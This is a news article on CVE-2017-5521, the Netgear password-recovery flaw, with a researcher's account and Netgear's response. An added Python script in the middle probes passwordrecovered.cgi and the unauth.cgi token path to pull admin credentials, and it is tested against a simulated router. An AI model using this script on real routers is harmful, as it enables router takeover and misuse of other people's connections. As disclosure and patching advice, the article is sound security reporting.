Netgear exploit could expose passwords for thousands of routers

It’s time to update your firmware. A vulnerability in a number of Netgear routers can hand an attacker your router’s admin password, which could lead to being locked out of your own router or, worse, illicit use of your Internet connection.

The vulnerability, which Netgear has now patched on most affected models, builds on a bug first reported in 2014 that exposes the admin password in plain text.

A researcher for Trustwave, Simon Kenin, first uncovered the problem about a year ago when he forgot his own administration password. Rather than reset the router, he tried to hack into it, eventually uncovering an undocumented feature designed to allow password recovery.

He wrote:

I woke up the next morning excited by the discovery, I thought to myself: “3 routers with the same issue… Coincidence? I think not”. Luckily, I had another, older NETGEAR router lying around; I tested it and bam! Exploited.

I started asking people I knew if they had NETGEAR equipment so I could test further to see the scope of the issue. In order to make life easier for non-technical people I wrote a python script called netgore, similar to wnroast, to test for this issue.

I am not a great programmer. I am aware of that and that is why I don’t work as a full-time programmer. As it turned out, I had an error in my code where it didn’t correctly take the number from unauth.cgi and passed gibberish to passwordrecovered.cgi instead, but somehow it still managed to get the credentials!

“Wait… what is going on here?” I thought to myself. After a few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what parameter you send. This is a totally new bug that I haven’t seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models.
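The two checks Kenin describes, written out as an added example (this is not Trustwave’s netgore script and not Netgear’s code): first, a request to passwordrecovered.cgi with a bogus parameter, which on the wider set of models answers on the very first call; second, the older 2014 path, where unauth.cgi hands back a number that is then passed to passwordrecovered.cgi. The query parameter name `id` and the text format of the responses are assumptions, not given on the page, so both would need adjusting against a real device. The HTTP layer is injected as a `fetch` callable so the logic can be exercised offline against a constructed simulated router.

```python
import re
import secrets
from typing import Callable, Dict, Optional, Tuple

# A fetch function takes a path such as "/unauth.cgi?id=123" and returns the
# response body as text. For a live check you would wrap a real HTTP client
# (e.g. requests.get(base_url + path).text); the simulated router below lets
# this run offline.
Fetch = Callable[[str], str]

# ASSUMED response formats (not stated on the page): unauth.cgi echoes a
# numeric token as "id=<digits>", and passwordrecovered.cgi prints the
# credentials as "Router Admin Username: ..." / "Router Admin Password: ..." lines.
TOKEN_RE = re.compile(r"\bid=(\d+)")
USER_RE = re.compile(r"Router Admin Username:\s*(\S+)")
PASS_RE = re.compile(r"Router Admin Password:\s*(\S+)")


def extract_token(body: str) -> Optional[str]:
    """Pull the recovery token out of an unauth.cgi response, if present."""
    m = TOKEN_RE.search(body)
    return m.group(1) if m else None


def extract_credentials(body: str) -> Optional[Tuple[str, str]]:
    """Return (username, password) if the body leaks admin credentials."""
    u, p = USER_RE.search(body), PASS_RE.search(body)
    return (u.group(1), p.group(1)) if u and p else None


def check_router(fetch: Fetch) -> Dict[str, object]:
    """Run both checks and report which (if either) leaked credentials.

    Order matters: the page says the *first* call to passwordrecovered.cgi
    answers regardless of parameter, so the bogus-id probe must go before the
    token handshake. Doing the handshake first would consume that first call
    and wrongly attribute the leak to the token bug.
    """
    result: Dict[str, object] = {
        "first_call_leak": False, "token_leak": False, "credentials": None}

    # Check 2 (Kenin's "new bug"): bogus parameter on the very first call.
    creds = extract_credentials(fetch("/passwordrecovered.cgi?id=gibberish"))
    if creds:
        result["first_call_leak"] = True
        result["credentials"] = creds

    # Check 1 (the 2014 bug): obtain a token from unauth.cgi and replay it.
    probe = secrets.randbelow(900000) + 100000  # any value; server issues the token
    token = extract_token(fetch(f"/unauth.cgi?id={probe}"))
    if token:
        creds = extract_credentials(fetch(f"/passwordrecovered.cgi?id={token}"))
        if creds:
            result["token_leak"] = True
            result["credentials"] = creds
    return result


class SimulatedRouter:
    """Constructed stand-in for a device, modelling the behaviour the page describes.

    first_call_bug: the first passwordrecovered.cgi call leaks whatever the parameter.
    token_bug:      passwordrecovered.cgi leaks when given the token unauth.cgi issued.
    """

    def __init__(self, first_call_bug: bool, token_bug: bool,
                 user: str = "admin", password: str = "hunter2") -> None:
        self.first_call_bug, self.token_bug = first_call_bug, token_bug
        self.user, self.password = user, password
        self.token: Optional[str] = None
        self.recovery_calls = 0

    def _creds(self) -> str:
        return (f"Router Admin Username: {self.user}\n"
                f"Router Admin Password: {self.password}\n")

    def fetch(self, path: str) -> str:
        page, _, query = path.partition("?")
        params = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
        if page == "/unauth.cgi":
            self.token = str(secrets.randbelow(900000) + 100000)
            return f"<html><body>recovery id={self.token}</body></html>"
        if page == "/passwordrecovered.cgi":
            self.recovery_calls += 1
            if self.first_call_bug and self.recovery_calls == 1:
                return self._creds()
            if self.token_bug and self.token and params.get("id") == self.token:
                return self._creds()
            return "<html>Access denied</html>"
        return "<html>404</html>"


if __name__ == "__main__":
    for name, dev in [("both bugs", SimulatedRouter(True, True)),
                      ("first-call only", SimulatedRouter(True, False)),
                      ("token only", SimulatedRouter(False, True)),
                      ("patched", SimulatedRouter(False, False))]:
        print(name, check_router(dev.fetch))
```

Because the first-call behaviour is a one-shot per boot, a live check against a device that has already served one recovery request will only ever exercise the token path; rebooting the router before testing is the only way to observe the second bug reliably. Only probe equipment you own or are authorised to test.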

The exploit affects the following models:

[Image: list of affected Netgear models; not reproduced in this text]

If you have any of these, check the router’s admin panel for a firmware update. Until the fix is applied, make sure remote management is turned off so that the password-recovery pages can only be reached from inside your own network.

UPDATE – Netgear writes:

NETGEAR is aware of the vulnerability (CVE-2017-5521), that has been recently publicized by TrustWave. This is not a new or recent development. We have been working with the security analysts to evaluate the vulnerability. NETGEAR has published a knowledge base article from our support page, which lists the affected routers and the available firmware fix.

Firmware fixes are currently available for the majority of the affected devices. To download the firmware release that fixes the password recovery vulnerability, click the link for the model and visit the firmware release page for further instructions. For devices that are still pending final firmware updates, please follow the advised work around.

Please note that this vulnerability occurs when an attacker can gain access to the internal network or when remote management is enabled on the router. Remote management is turned off by default; although remote management can be turned on through the advanced settings.

NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitor for both known and unknown threats. Being proactive rather than reactive to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.